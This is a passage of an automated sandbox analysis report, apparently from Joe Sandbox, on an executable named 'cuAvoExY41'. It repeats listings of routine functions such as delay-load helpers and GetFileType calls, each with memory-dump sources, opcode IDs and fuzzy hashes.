                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                          • String ID:
                                                          • API String ID: 897784432-0
                                                          • Opcode ID: 3d4256d4d0698d651a7bfe9b51f4780770efcd18f3bd49b102fb9ca47b2ffb7c
                                                          • Instruction ID: 31df27f419cc46a3d2860b4277b4fae85b9441a0c0a7e71642ae63416efba8ae
                                                          • Opcode Fuzzy Hash: 3d4256d4d0698d651a7bfe9b51f4780770efcd18f3bd49b102fb9ca47b2ffb7c
                                                          • Instruction Fuzzy Hash: BFD09E71144301BAD6116B51CE07F1A7AB6BB88B05F004958B284740B1CA779D21EB11
                                                          Function 00FB98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileType.KERNELBASE(000000FF,00FB97BE), ref: 00FB98C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID:
                                                          • API String ID: 3081899298-0
                                                          • Opcode ID: 72eec1e16b4ee46d437e515d77878a2563750bb1c78dd7bddf8f2567e4a7dbba
                                                          • Instruction ID: fcb77d6c7a57f81d2447ec8bf11871cd8b4f3bda7814d319000de8facd449612
                                                          • Opcode Fuzzy Hash: 72eec1e16b4ee46d437e515d77878a2563750bb1c78dd7bddf8f2567e4a7dbba
                                                          • Instruction Fuzzy Hash: 50C01234808105858E20472998480D57321AE533757F49694C228894A1C362CC47FE00
                                                          Function 00FCE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: f287b8071a186292247309219228fc7c2dcef4144c77ff1b546384ddaa249fc5
                                                          • Instruction ID: b3218129f4d91fc9249e868ae0e71c8fb17f76ba4d1c7000e62d71f3c815f4cc
                                                          • Opcode Fuzzy Hash: f287b8071a186292247309219228fc7c2dcef4144c77ff1b546384ddaa249fc5
                                                          • Instruction Fuzzy Hash: 56B012D2259142AC300852065F03F37111CD3C2B20334C12EFC05C41C0D844FD053872
                                                          Function 00FCE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: d45b9fa17201a65d0e3fee1bca6531f59b7994438e037e25216e7ab1baef32bc
                                                          • Instruction ID: 43053e5a7c96414b8ed2740eec8f5fe7906a6889f5315fb793b66f3104087f1e
                                                          • Opcode Fuzzy Hash: d45b9fa17201a65d0e3fee1bca6531f59b7994438e037e25216e7ab1baef32bc
                                                          • Instruction Fuzzy Hash: 55B012D625D242AC3008514A5F03F37112CE3C0B20334402EF805C40C0D884BD013972
                                                          Function 00FCE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: cb21889cbda6aef05d4ced83288a50c049f4b8e3e34653e8243f00a5b3d61a82
                                                          • Instruction ID: 188781fe70164dba939d60c183cb96f889e03b1b804059200965029381e34f8e
                                                          • Opcode Fuzzy Hash: cb21889cbda6aef05d4ced83288a50c049f4b8e3e34653e8243f00a5b3d61a82
                                                          • Instruction Fuzzy Hash: E2B012D6659242BC300811465F03E37111CD3C1B20334842EFC01C44C0D884FD013872
                                                          Function 00FCE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: ff8386451842133f778cc16b5d286d0f510822185a2e8699f5e800a6e816c525
                                                          • Instruction ID: 0e59cdebb0cdfe14f0ae87c1b775c33fe422f43c521d14a2d149675b71859506
                                                          • Opcode Fuzzy Hash: ff8386451842133f778cc16b5d286d0f510822185a2e8699f5e800a6e816c525
                                                          • Instruction Fuzzy Hash: F7B012E2299142AC300851065F03F3711ACD3C0B20334402EF805C40C0DC44BE023872
                                                          Function 00FCE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 0dea6895bb3ed4e135062bbb328f97b689141d82b3a196678a4888e341c7bc25
                                                          • Instruction ID: a936da65ce34f13702db2881de63ddd2df4b2fbd9427af9e81b3da7d510af85b
                                                          • Opcode Fuzzy Hash: 0dea6895bb3ed4e135062bbb328f97b689141d82b3a196678a4888e341c7bc25
                                                          • Instruction Fuzzy Hash: A6B012D2259142AC300851565F03F37115CD3C1B20334802EFC05C40C0D844FD013872
                                                          Function 00FCE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 6508b250222af0adcb307fbe9c64514ee0c6a002db354813d8922a6035a082cf
                                                          • Instruction ID: 9d51c895680c7d2ebba2ce585c859f6ece6897b28db04551539917c19bd0e1e0
                                                          • Opcode Fuzzy Hash: 6508b250222af0adcb307fbe9c64514ee0c6a002db354813d8922a6035a082cf
                                                          • Instruction Fuzzy Hash: EFB012D226A182AC300851065F03F37115DF7C0B30334402EF806C40C0D844BD013872
                                                          Function 00FCE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: fafef3904affbdf515b39e93fe9bfd0af67164b8bfd3b35e4f773cf052f0dbcb
                                                          • Instruction ID: f20aa832437a240a9123b67a8a3480dfc12e9479644f1e59b2c78accf7060e17
                                                          • Opcode Fuzzy Hash: fafef3904affbdf515b39e93fe9bfd0af67164b8bfd3b35e4f773cf052f0dbcb
                                                          • Instruction Fuzzy Hash: 78B012E225A282BC304852065F03F37111DE3C0B30334412EFC05C40C0D844BD453872
                                                          Function 00FCE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 0ce74a03560b66ac02d0d7c70c7a336b9a6576de6b1a075533d4ede90a53d9eb
                                                          • Instruction ID: 01cb4dbf343d998b236a4d5be207b7d3920380f5ddf13894b72d620b77640e3a
                                                          • Opcode Fuzzy Hash: 0ce74a03560b66ac02d0d7c70c7a336b9a6576de6b1a075533d4ede90a53d9eb
                                                          • Instruction Fuzzy Hash: C8B012D225A182AC300851075F03F37111DE3C1B30334802EFC05C40C0D844FD013872
                                                          Function 00FCE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 44f55463e839152ffdb2b4140da4e322d2a39cd49f32954f4a633895fedf9056
                                                          • Instruction ID: a86a1680799c919e862eb53ee1b77d8d2eb8acc1589245738f92e414b5caef2e
                                                          • Opcode Fuzzy Hash: 44f55463e839152ffdb2b4140da4e322d2a39cd49f32954f4a633895fedf9056
                                                          • Instruction Fuzzy Hash: BAB012E2259142AC300851075F03F37111CE3C0F20334402EF805C40C0D844BE013872
                                                          Function 00FCE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 4c3c1dcae513380159868d6c9e4a1a5dc0b6eb1cb4fa322c653e40d70502fc55
                                                          • Instruction ID: 392960cd4f045756230a8f4b4df2960bcf1f74ac093ad6a18489791a499f117b
                                                          • Opcode Fuzzy Hash: 4c3c1dcae513380159868d6c9e4a1a5dc0b6eb1cb4fa322c653e40d70502fc55
                                                          • Instruction Fuzzy Hash: A5B012E2299142AC300851065F03F37111CD3C0F20334402EF805C40C0DC44BF023872
                                                          Function 00FCE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: a5c6ffd081bb9b5332fbceebbc24e7882b56d46fe235a1a17d08c708e4a20e71
                                                          • Instruction ID: 176a16ed293222339daebd5f823a1773cf42d9059361a5e92faa229cb40ccb36
                                                          • Opcode Fuzzy Hash: a5c6ffd081bb9b5332fbceebbc24e7882b56d46fe235a1a17d08c708e4a20e71
                                                          • Instruction Fuzzy Hash: 8DB012E2259242BC304851065F03F37111CD3C0F20334412EFC05C40C0D844BE413872
                                                          Function 00FCE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: d1d2e4006e275cf08b2238354f8e3620f8a42cbf38c7c9b610a703ae43bc499d
                                                          • Instruction ID: 688f430cdc8230435e0c3975f8a8d49ed78ee1cba4940e416a11e92696ec0b9b
                                                          • Opcode Fuzzy Hash: d1d2e4006e275cf08b2238354f8e3620f8a42cbf38c7c9b610a703ae43bc499d
                                                          • Instruction Fuzzy Hash: 3AB012E2259142BC300851065F03F37115CD3C1F20334802EFC05C40C0D844FE013872
                                                          Function 00FCE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 7771443ccf67b0b8c16961e0694c1e3f17fc69da94729a57168d18657b86a375
                                                          • Instruction ID: ba700c62dcd14ec6ed3dfa2d2f23b5c387dbab8fba4f3a13e37dde9fa0fbf167
                                                          • Opcode Fuzzy Hash: 7771443ccf67b0b8c16961e0694c1e3f17fc69da94729a57168d18657b86a375
                                                          • Instruction Fuzzy Hash: A9B012D2399142AC300852065F03F37111CD3C1B20334802EF805C41C0DC54BE0A3872
                                                          Function 00FCE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
